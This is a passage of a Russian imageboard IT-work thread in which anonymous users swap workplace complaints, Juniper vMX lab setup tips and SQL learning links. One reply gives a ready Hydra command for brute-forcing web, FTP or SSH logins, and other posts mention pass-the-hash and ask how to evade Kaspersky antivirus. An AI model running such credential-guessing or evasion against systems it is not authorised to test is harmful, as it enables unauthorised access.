Гуйню все равно от МС использовать, ибо так это ну просто пиздец. А в целом, Самба уже может быть контроллером, но с целой кучей костылей и ограничений.
Аноним 19/01/18 Птн 15:19:44 #716 №1166053 
>>1166049
>В сбербанке вот всё на винде, и в газпроме тоже.

Не всё, но домен виндовый, да.
ДВА С ПОЛОВИНО!1!! Аноним 19/01/18 Птн 15:52:06 #717 №1166076 
изображение.png
Два с половиной года я и шеф сидели подали от начальства и основной движухи в другом корпусе аж через дорогу - ведь оборудованию и серверам похуй откуда их перезагружают.

И тут пошли новости что начальство переселяет нас в основной корпус аккурат в коридор, куда выходят кабинеты начальников управлений и отделов - чтобы было проще контролировать и ебать.


Дисциплину не нарушаем нарушаем так, чтобы остальные об этом не знали, по работе косяков за нами нет - а всё равно хотят переселить - безумные женщины-начальники с синдромом начальника.

И ведь это значит что НУЖНО БУДЕТ ПРИХОДИТЬ ВОВРЕМЯ АААРРР - а я уже так привык приходить позже на пол часа. А ещё будет нужно отмечаться в СКУД - когда у нас в корпусе этой системы вообще не установлено и вообще приходи/уходи когда хочешь - выпалить тебя могут только по телефонному звонку.

Увы - всё в этой жизни кончается. В том числе прекрасное сычевание в необорудованном СКУД корпусе на отшибе от начальства.


Аноним 19/01/18 Птн 15:55:21 #718 №1166078 
15154384326761.jpg
>>1166049
>всё на винде
и роутер тоже
Аноним 19/01/18 Птн 19:09:50 #719 №1166249 
>>1163304
Pass-the-hash /thread

Мимо студент учившийся на админа и вынужденный чинить принтеры.
Аноним 19/01/18 Птн 21:41:25 #720 №1166346 
>>1166078
Ну так роутер и не на линуксе, он от циски и на ios.
Аноним 20/01/18 Суб 12:26:06 #721 №1166526 
>>1166249
>Мимо студент учившийся на админа
На админа надо учится? Я думал достаточно 9 классов и трехнедельных курсов.
мимо менеджер ИТ-проектов/бизнес-аналитик из банка
Аноним 20/01/18 Суб 12:26:49 #722 №1166527 
>>1166526
По факту достаточно мануал загуглить.
Аноним 20/01/18 Суб 18:32:38 #723 №1166749 
>>1166346
> Ну так роутер и не на линуксе, он от циски и на ios.
А иос это такая перепиленная freebsd.
Аноним 20/01/18 Суб 20:44:05 #724 №1166812 
>>1166749
Скорее проприетарный unix.
Аноним 22/01/18 Пнд 12:50:21 #725 №1167504 
Очень специфичный вопрос, но кто еще знает, если не ананас

Покупал ли кто-нибудь премиум на examcollection.com?
Вопрос простейший и хуйня, но нужна информация именно от купившего подписку или скачавшего премиум файл у них
Аноним 22/01/18 Пнд 13:29:12 #726 №1167518 
Посоветуйте какие-нибудь уроки по wireshark (желательно видео) с разбором всех ньансов
Аноним 22/01/18 Пнд 13:30:11 #727 №1167519 
>>1167504
.VCE, дамп экзамена и вот это всё
Аноним 22/01/18 Пнд 19:08:22 #728 №1167792 
>>1163938
>ещё получить диплом "хотя-бы бауманки"
А почему его не хочет получить hr?
Аноним 22/01/18 Пнд 19:14:25 #729 №1167795 
New thread

>>1167794 (OP)
https://2ch.hk/wrk/res/1167794.html
Аноним 22/01/18 Пнд 19:18:37 #730 №1167798 
>>1167792
Ну так то что он смог занять место HR'а уже показатель его квалификации, это вообще-то не так просто. С админством по крайней мере не сравнится уж точно.
Аноним 22/01/18 Пнд 19:27:34 #731 №1167800 
New thread

>>1167794 (OP) (OP)
https://2ch.hk/wrk/res/1167794.html
Аноним 22/01/18 Пнд 19:28:54 #732 №1167801 
>>1167798
>это вообще-то не так просто
А как?
Аноним 22/01/18 Пнд 19:31:24 #733 №1167804 
>>1167801
!так
Аноним 22/01/18 Пнд 19:41:05 #734 №1167811 
1sKIE7B0Q7Q.jpg
>>1161086
Всегда проигрываю с инженеров по системной безопасности. Необразованные дебилы с синдромом вахтёра, поглупее некоторых солдат.
Аноним 22/01/18 Пнд 19:45:21 #735 №1167813 
>>1163145
Ну тогда что ты тут разнылся-то, чудик? Иди установи убунту в виртуалке ещё раз.
Аноним 22/01/18 Пнд 20:52:08 #736 №1167834 
Пацаны, иксперты, искуственно интелектуалусы поясните за семантические сети и продукционные модели. Препод мне говорил что со слишком большими (1к+ элементов) сетями начинаются проблемы. Приведите реальные примеры таких проблем плиз, хочу изучить
Аноним 23/01/18 Втр 09:42:31 #737 №1167986 
Webp.net-resizeimage (2).jpg
Аноны, хочу поковырять виртуальные huawei и juniper.
Есть ли готовые решения типа gns для циски?
А что скажете про UNetLab?
Аноним 24/01/18 Срд 11:27:01 #738 №1168675 
А тут есть кто работает в больших компаниях ? Из группы ВТБ есть кто? Давайте вместо охуевать от бюрократии
Аноним 24/01/18 Срд 11:48:54 #739 №1168682 
>>1168675
Я работаю в Почте России, бюрократия тут это святое.
Аноним 24/01/18 Срд 12:07:52 #740 №1168686 
>>1168682
дс? я в Втб капитале
Аноним 25/01/18 Чтв 10:02:36 #741 №1169127 
>>1168686
ДС2, рулим отсюда всем северо-западным регионом
Аноним 26/01/18 Птн 09:59:57 #742 №1169767 
>>1167986
>>1167986
Juniper VMX можно запускать под EVE, под GNS или просто под ESXi. Последний вариант - наиболее разумный, поскольку новые версии (17 и выше) жрут много ресурсов. Две виртуалки - VCP и VFP. На вфп и вцп нулевые интерфейсы - менеджмент, первые - надо соединить, чтобы они друг друга увидели. На вфп - эти интерфейсы - e1000. Далее на вфп надо добавить портов. Тип сетевухи для портов - VMXNET3. То есть на VFP машине - первые две сетевухи - e1000, остальные - VMXNET3. VCP - 1 проц и два гига памяти, VFP - 3 проца и 6 гигов. Должно взлететь. Если это слишком жирно для твоего сервака - попробуй VSRX или найди в сети бету 14 VMX (там одна виртуалка на все.) Но в VMX 14 не работает CoS, глючат фаерволы и нет всяких прикольных штук типа evpn.
Аноним 26/01/18 Птн 10:04:39 #743 №1169768 
>>1167986
Чуть не забыл. Для настоящих отморозков есть еще внутренний Джуниперовский штуковин - WiStar
https://github.com/Juniper/wistar
Аноним 28/01/18 Вск 20:58:10 #744 №1170840 
Анончики, хочу вырваться из эникейного рабства и даже нашел нормальную вакансию, но есть одно но - требуют начального знания SQL, а я его не знаю от слова совсем. Ну, то есть я его видел, но никогда не использовал и, конечно, какую-нибудь сложную выборку придумать на ходу не смогу.

Т.к. они хотят именно начальный левел SQL, у меня есть надежда, что я смогу его задрочить и освоить за небольшой промежуток времени.

Так вот, анон, ты знаешь какой-нибудь годный тренажер по скулю? Желательно совмещенный с учебником/справочником? Чтение документации это очень увлекательно, но мою цель быстро освоить скуль не приблизит.
Аноним 29/01/18 Пнд 01:23:01 #745 №1170928 
>>1170840
>>1170840
Посмотри его
https://www.youtube.com/watch?v=lvTp2RqSm58
потом запросы поделай
Аноним 29/01/18 Пнд 01:23:27 #746 №1170929 
https://www.youtube.com/watch?v=uxW-qS_I0fY
Аноним 29/01/18 Пнд 08:47:36 #747 №1170991 
>>1170928
>потом запросы поделай
Где, например?
Аноним 29/01/18 Пнд 09:17:43 #748 №1171002 
>>1170840
Тебе сюда:
https://www.sololearn.com/Course/SQL/
Аноним 29/01/18 Пнд 09:26:24 #749 №1171008 
>>1171002
Благодарствую. А сам проходил их? Боюсь потерять время на откровенную элементарщину.
Начну сегодня.
Аноним 29/01/18 Пнд 09:33:48 #750 №1171010 
>>1171008
Я проходил там пайтон - платформа очень хорошая, чтобы быстро с чем-то познакомиться или что-то оперативно повторить. Сикуэль не знаю от слова совсем, но судя по содержанию курса - охват тем хороший.
Аноним 29/01/18 Пнд 09:40:06 #751 №1171012 
>>1171008
Забыл сказать, что у sololearn отличное приложение под телефон/планшет - можно ботать где угодно, был бы инет. И почему-то в мобильной версии у меня курсы на русском языке, а как переключить язык в веб версии - ХЗ.

>>1171010-кун
Аноним 29/01/18 Пнд 11:00:06 #752 №1171042 
Господа, такой вопрос: есть ли инструмент для автоматического подбора дефолных логинов-паролей для сетевых устройств?
Поясню. Работаю в конторе, много управляемых сетевых устройств разных вендоров - циски, длинки, 3комы, хуавеи, короче, зоопарк. Нужно просканить их (естессно, автоматически) на наличие незапароленных веб-морд. Т.е. наличие открытой веб-морды меня устраивает, мне лишь надо убедиться в том, что там не оставлен дефолтный admin:admin (причем они же могут быть разные для разных вендоров).
Аноним 29/01/18 Пнд 11:37:21 #753 №1171057 
>>1171042
>>1171042
https://2ch.hk/wrk/res/1167794.html
Аноним 29/01/18 Пнд 11:41:35 #754 №1171058 
>>1171042
Есть такой инструмент, гидра называется. Для веб-морды работающей по GET можно вот так сбрутать:
hydra -l user.txt -P pass.txt hostname http-get /login.php
Разумеется, поддерживается и POST, и ftp, ssh и т.д. главное чтобы на стороне сервера таймаута не было после нескольких неудачных попыток.
Аноним 29/01/18 Пнд 11:45:47 #755 №1171060 
>>1171057
Куда ты меня отправил?

>>1171058
спосибо
Аноним 29/01/18 Пнд 14:19:51 #756 №1171113 
image.png
Знатоки, как наебать KES?
Аноним 29/01/18 Пнд 16:41:33 #757 №1171173 
>>1171113
Оставаясь в старом треде - никак...
Аноним 29/01/18 Пнд 17:05:21 #758 №1171186 
>>1171173
kjkj
Аноним 29/01/18 Пнд 17:16:19 #759 №1171194 
>>1171173
Перекот пилите. Чо вы как эти-то?..
Аноним 29/01/18 Пнд 21:47:57 #760 №1171444 
>>1171194
/wrk/1167794 - IT-тред #75
Аноним 30/01/18 Втр 02:20:45 #761 №1171556 
>>1171194
долбоёб
comments powered by Disqus

Отзывы и предложения